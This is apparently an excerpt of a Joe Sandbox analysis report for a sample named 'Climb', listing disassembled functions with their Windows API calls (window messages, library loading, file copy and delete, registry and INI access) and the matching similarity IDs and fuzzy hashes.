                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                          • API String ID: 2081771294-1403004172
                                                                                                                                                                          • Opcode ID: 51a68fdb35d401cde857f8e85abdc94e07061650a697fcd817c1d818652a225b
                                                                                                                                                                          • Instruction ID: 1e148c0f3adabe051a453d2718927b780a6ca838837b79c4fdf1a3a841a2df4e
                                                                                                                                                                          • Opcode Fuzzy Hash: 51a68fdb35d401cde857f8e85abdc94e07061650a697fcd817c1d818652a225b
                                                                                                                                                                          • Instruction Fuzzy Hash: 7021F771A00104BFDB15ABA4DC8AEFFBBB9DF45760B11422DF422A71E1DB38494AD760
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00AF3A29
                                                                                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 00AF3A30
                                                                                                                                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00AF3A45
                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 00AF3A4D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                          • String ID: SysAnimate32
                                                                                                                                                                          • API String ID: 3529120543-1011021900
                                                                                                                                                                          • Opcode ID: 716bfd21e1f6f632e76ee6c9e70c1d91fb980a6fea4e65d7fec393ee4e36b042
                                                                                                                                                                          • Instruction ID: 948a508031c20c98ffb94aecfcbda5acd39a910d938edaaea0a78cb5e63e5951
                                                                                                                                                                          • Opcode Fuzzy Hash: 716bfd21e1f6f632e76ee6c9e70c1d91fb980a6fea4e65d7fec393ee4e36b042
                                                                                                                                                                          • Instruction Fuzzy Hash: C221AEB2600209ABEF11AFE5DC90FBB77A9EF453A4F105618FB91971A0C7B2CD419760
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A8508E,?,?,00A8502E,?,00B298D8,0000000C,00A85185,?,00000002), ref: 00A850FD
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A85110
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00A8508E,?,?,00A8502E,?,00B298D8,0000000C,00A85185,?,00000002,00000000), ref: 00A85133
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                          • Opcode ID: c68c118c5bf11b54d100981cb128a9a19f96600d5a7156241d9e1793d0e7b2b0
                                                                                                                                                                          • Instruction ID: 404ac47b5083da791a0e8b71f7030996e53299976a0df94d7f54f8485858331d
                                                                                                                                                                          • Opcode Fuzzy Hash: c68c118c5bf11b54d100981cb128a9a19f96600d5a7156241d9e1793d0e7b2b0
                                                                                                                                                                          • Instruction Fuzzy Hash: 97F06230A00208BBDB15EFE4DC49BADBFF6EF44752F0001A8F805A61A0DB749E41DB95
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A6668B,?,?,00A662FA,?,00000001,?,?,00000000), ref: 00A6664A
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A6665C
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00A6668B,?,?,00A662FA,?,00000001,?,?,00000000), ref: 00A6666E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                          • API String ID: 145871493-3689287502
                                                                                                                                                                          • Opcode ID: 83fcf65897035b9b54cd5c3a0c899cef017007a9f8816fdbc09fd0149e30ac6f
                                                                                                                                                                          • Instruction ID: 30c14269fbc64a32ffda9154e55d0af331a2f4321b643f37b7f7b70c99981ce5
                                                                                                                                                                          • Opcode Fuzzy Hash: 83fcf65897035b9b54cd5c3a0c899cef017007a9f8816fdbc09fd0149e30ac6f
                                                                                                                                                                          • Instruction Fuzzy Hash: EEE01D3960153257921717A5FC0CB7E657A9F92F16B050315FD04D6154DFA4CD03C5E9
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AA5657,?,?,00A662FA,?,00000001,?,?,00000000), ref: 00A66610
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A66622
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00AA5657,?,?,00A662FA,?,00000001,?,?,00000000), ref: 00A66635
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                          • API String ID: 145871493-1355242751
                                                                                                                                                                          • Opcode ID: 0801c69c3d2175db000b7352b8c5424967281b9d006b5ab65d09103bdcdd818e
                                                                                                                                                                          • Instruction ID: b0e64307c53ebb3393f27427431b45dd656e8d3f9f5df103b31de826aa17b4cf
                                                                                                                                                                          • Opcode Fuzzy Hash: 0801c69c3d2175db000b7352b8c5424967281b9d006b5ab65d09103bdcdd818e
                                                                                                                                                                          • Instruction Fuzzy Hash: BFD0123961297267422767A5BC189AE6A269E95B113050515B904B6114CF60CD02C5DD
                                                                                                                                                                          APIs
                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AD35C4
                                                                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 00AD3646
                                                                                                                                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00AD365C
                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AD366D
                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AD367F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Delete$Copy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3226157194-0
                                                                                                                                                                          • Opcode ID: e113edc8e14377ca126b06876a783d053e8ce4cbc48202d6b22a0771ec5163b3
                                                                                                                                                                          • Instruction ID: 1c85ff0d4ce9686ae13de2c5f75f7ec351b702a2a16f1031248bd67a0363c8c0
                                                                                                                                                                          • Opcode Fuzzy Hash: e113edc8e14377ca126b06876a783d053e8ce4cbc48202d6b22a0771ec5163b3
                                                                                                                                                                          • Instruction Fuzzy Hash: CEB141B2D00119ABDF11EBA4CD85EDFBBBDEF48314F0040A6F50AA7251EA349B45CB61
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00AEAE87
                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00AEAE95
                                                                                                                                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00AEAEC8
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00AEB09D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3488606520-0
                                                                                                                                                                          • Opcode ID: 47fc4f4d5e732f9e94aa5add8d8e4c8db1650dee7322675c311cfc9b71debbe9
                                                                                                                                                                          • Instruction ID: 51b99ae0adbef01625b2fbd0681b621f204e8f75ae3de9ad74a3cec7f520f049
                                                                                                                                                                          • Opcode Fuzzy Hash: 47fc4f4d5e732f9e94aa5add8d8e4c8db1650dee7322675c311cfc9b71debbe9
                                                                                                                                                                          • Instruction Fuzzy Hash: 5EA1CE75A00300AFE720DF28C986F2BB7E5AF44710F14881DF5A99B292DB71EC41CB92
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333
                                                                                                                                                                            • Part of subcall function 00AED3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AEC10E,?,?), ref: 00AED415
                                                                                                                                                                            • Part of subcall function 00AED3F8: _wcslen.LIBCMT ref: 00AED451
                                                                                                                                                                            • Part of subcall function 00AED3F8: _wcslen.LIBCMT ref: 00AED4C8
                                                                                                                                                                            • Part of subcall function 00AED3F8: _wcslen.LIBCMT ref: 00AED4FE
                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AEC505
                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AEC560
                                                                                                                                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00AEC5C3
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?), ref: 00AEC606
                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00AEC613
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 826366716-0
                                                                                                                                                                          • Opcode ID: 71ead8150a62ca798058d474fc617d1896b6a7d52e748091fa9571ad077f4e22
                                                                                                                                                                          • Instruction ID: 53be60f807ee9b2964240d9bba4d90b32c8cbd6bf43fd6fdced0e0af823cf9b1
                                                                                                                                                                          • Opcode Fuzzy Hash: 71ead8150a62ca798058d474fc617d1896b6a7d52e748091fa9571ad077f4e22
                                                                                                                                                                          • Instruction Fuzzy Hash: BE619271108281AFD714DF15C590E2ABBF5FF84318F54855CF49A8B2A2DB31ED46CBA1
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00ACE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00ACD7CD,?), ref: 00ACE714
                                                                                                                                                                            • Part of subcall function 00ACE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00ACD7CD,?), ref: 00ACE72D
                                                                                                                                                                            • Part of subcall function 00ACEAB0: GetFileAttributesW.KERNEL32(?,00ACD840), ref: 00ACEAB1
                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00ACED8A
                                                                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 00ACEDC3
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00ACEF02
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00ACEF1A
                                                                                                                                                                          • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00ACEF67
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3183298772-0
                                                                                                                                                                          • Opcode ID: a1c771cd2bd90181d36be8201218810e1bca5be4f6883916482b91dcd48264c5
                                                                                                                                                                          • Instruction ID: d3048f3af61d75c0fe9c9dd6f8bef835726af83354c5fe74dc0158071cd2ae44
                                                                                                                                                                          • Opcode Fuzzy Hash: a1c771cd2bd90181d36be8201218810e1bca5be4f6883916482b91dcd48264c5
                                                                                                                                                                          • Instruction Fuzzy Hash: C45150B25083859FC725EB94D981EDBB3ECEF84340F40092EF689D7151EF31A6888766
                                                                                                                                                                          APIs
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00AC9534
                                                                                                                                                                          • VariantClear.OLEAUT32 ref: 00AC95A5
                                                                                                                                                                          • VariantClear.OLEAUT32 ref: 00AC9604
                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00AC9677
                                                                                                                                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00AC96A2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4136290138-0
                                                                                                                                                                          • Opcode ID: 9179073b4effce963c0eff4659e2545b40eb9ac79cf0fdc674405d91013abb57
                                                                                                                                                                          • Instruction ID: 53cc84a8b90ec82aa029ea5cbbfea7d08f03aab15be5776ff6a426687bd66f84
                                                                                                                                                                          • Opcode Fuzzy Hash: 9179073b4effce963c0eff4659e2545b40eb9ac79cf0fdc674405d91013abb57
                                                                                                                                                                          • Instruction Fuzzy Hash: 1B5139B5A00619EFCB14CF68C884EAAB7F9FF89314B168559E909DB350E730E911CF90
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00AD95F3
                                                                                                                                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00AD961F
                                                                                                                                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00AD9677
                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00AD969C
                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00AD96A4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2832842796-0
                                                                                                                                                                          • Opcode ID: 8d764aaaccac0a7b46890af029e7509267fad479c423ecdbef4a39e798e2e54e
                                                                                                                                                                          • Instruction ID: e927bcd24b36f20cba63a4025d07f0effe8be873706a3db78c44b236200bcde3
                                                                                                                                                                          • Opcode Fuzzy Hash: 8d764aaaccac0a7b46890af029e7509267fad479c423ecdbef4a39e798e2e54e
                                                                                                                                                                          • Instruction Fuzzy Hash: 6A514B75A00215AFCB01DFA4C985EAEBBF5FF48314F048059E84AAB362DB35ED41DB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00AE999D
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00AE9A2D
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00AE9A49
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00AE9A8F
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00AE9AAF
                                                                                                                                                                            • Part of subcall function 00A7F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00AD1A02,?,76D1E610), ref: 00A7F9F1
                                                                                                                                                                            • Part of subcall function 00A7F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00AC0354,00000000,00000000,?,?,00AD1A02,?,76D1E610,?,00AC0354), ref: 00A7FA18
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 666041331-0
                                                                                                                                                                          • Opcode ID: 308ddc5057c7c1e7ce6a63320e50c65d3c57851713601f7a3ff2c178cf958174
                                                                                                                                                                          • Instruction ID: 690a17c78b132258e3cf834f832eacb9b4fd47c31672b5e02ee6abb705945b78
                                                                                                                                                                          • Opcode Fuzzy Hash: 308ddc5057c7c1e7ce6a63320e50c65d3c57851713601f7a3ff2c178cf958174
                                                                                                                                                                          • Instruction Fuzzy Hash: A6515A35605245DFCB11DF69C4848AEBBF1FF09354B0481A9E80A9F362D731ED86CB91
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00AF766B
                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EC,?), ref: 00AF7682
                                                                                                                                                                          • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00AF76AB
                                                                                                                                                                          • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00ADB5BE,00000000,00000000), ref: 00AF76D0
                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00AF76FF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Long$MessageSendShow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3688381893-0
                                                                                                                                                                          • Opcode ID: e3ca17e5fc55e2e3a4f90ca40536e53801907cf8184cdddb886a5e487ec9ee9c
                                                                                                                                                                          • Instruction ID: 4374549ebb5ea4a7c96c07cc207a1373d672bd2e113779c88a969f6ab09156bd
                                                                                                                                                                          • Opcode Fuzzy Hash: e3ca17e5fc55e2e3a4f90ca40536e53801907cf8184cdddb886a5e487ec9ee9c
